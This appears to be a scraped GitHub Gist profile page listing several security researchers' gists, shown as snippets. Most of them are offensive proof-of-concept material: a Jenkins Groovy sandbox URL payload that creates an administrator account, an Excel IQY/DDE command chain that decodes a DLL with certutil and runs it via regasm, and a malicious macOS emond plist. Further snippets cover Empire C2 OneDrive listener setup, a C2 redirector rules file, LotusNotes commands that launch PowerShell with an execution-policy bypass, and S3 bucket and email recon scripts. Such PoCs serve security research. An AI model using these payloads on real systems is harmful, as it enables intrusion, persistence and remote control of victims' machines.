Skip to content

Instantly share code, notes, and snippets.

View benichmt1's full-sized avatar
🤔
??

Michael Benich benichmt1

🤔
??
42 followers · 31 following
  • NE Ohio
View GitHub Profile
@akhil-reni
akhil-reni / payload
Created July 26, 2019 13:23
Jenkins Metaprogramming RCE Create new user
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}
@Mr-Un1k0d3r
Mr-Un1k0d3r / remote.iqy
Last active April 27, 2022 19:25
IQY File Remote Payload POC
=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'
@Mr-Un1k0d3r
Mr-Un1k0d3r / poc.iqy
Created August 1, 2018 18:59
IQY File + Embedded DLL POC
WEB
1
https://ringzer0team.com/IQY
Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False
@fransr
fransr / bucket-disclose.sh
Last active June 19, 2024 08:56
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@mr64bit
mr64bit / empire-onedrive.txt
Last active October 13, 2021 14:49
Microsoft Graph setup for Empire Onedrive
Create an app at https://apps.dev.microsoft.com
The only things you need are an app password ("Generate new password"), an app platform with a redirect url, ("https://login.live.com/oauth20_desktop.srf" works good as a default) and the delegated permissions Files.ReadWrite, User.Read, and offline_access.
Example: https://imgur.com/a/rd47l
Once you create the app, you will be given an Application ID. Enter this into your listener options.
"set ClientId <your application id>"
"set ClientSecret <you application secret/password>"
Then do "execute". This will not start the listener yet, but will give you an OAuth URL to sign in to.
You will be redirected to a URL like "https://login.live.com/oauth20_desktop.srf?code=M12ac16111-a605-42e9-9dbf-c155de30cfc6&lc=1033". Take the code parameter from that URL and enter it into the listener options.
@0xbharath
0xbharath / emails_from_ct_logs.py
Created January 17, 2018 13:03
A script to extract emails from Certificate Transparency logs
from __future__ import print_function
__author__ = 'Bharath'
__version__ = "0.1.0"
try:
import psycopg2
except ImportError:
raise ImportError('\n\033[33mpsycopg2 library missing. pip install psycopg2\033[1;m\n')
sys.exit(1)
@xorrior
xorrior / bad.plist
Last active January 21, 2020 16:47
Example Malicious emond plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>empire rules</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
@curi0usJack
curi0usJack / .htaccess
Last active July 1, 2024 15:31
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@danielbohannon
danielbohannon / LotusNotes Running PowerShell Code
Created August 23, 2017 16:43
LotusNotes Running PowerShell Code
"C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Hashes of each binary (prepare for onslaught of md5 naysayers):
Notes.exe — 8f633ef1e1147637c25dd917909cd361
NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active June 23, 2024 20:29
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output